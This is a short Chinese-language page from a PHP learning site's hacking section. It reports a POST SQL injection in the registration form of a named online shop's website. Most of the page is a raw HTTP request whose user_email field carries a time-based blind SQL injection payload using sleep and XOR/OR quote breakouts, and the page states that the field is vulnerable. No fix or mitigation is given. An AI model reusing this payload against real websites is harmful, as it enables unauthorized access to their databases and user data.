网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

360shop官网post注入一枚 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] 漏洞网站:http: www 360shop com cnpost信息:POST register php HTTP 1 1Content-Length: 254Content-Type: application x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http: www...

漏洞网站:http://www.360shop.com.cn
 
post信息:
 
POST /register.php HTTP/1.1

Content-Length: 254

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: http://www.360shop.com.cn:80/

Cookie: 360shop_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; 360shop_sid=41122db3f1f267c38aa9a68ff9158120; 360shop_validity_time=0; PHPSESSID=l7498dqlinampsn9mga7gdlqi2

Host: www.360shop.com.cn

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2

Accept: */*



action=register&code_sn=94102&isagreement=1&password=g00dPa%24%24w0rD&register=1&repassword=g00dPa%24%24w0rD&user_email=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/

 

 
user_email存在漏洞
 
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论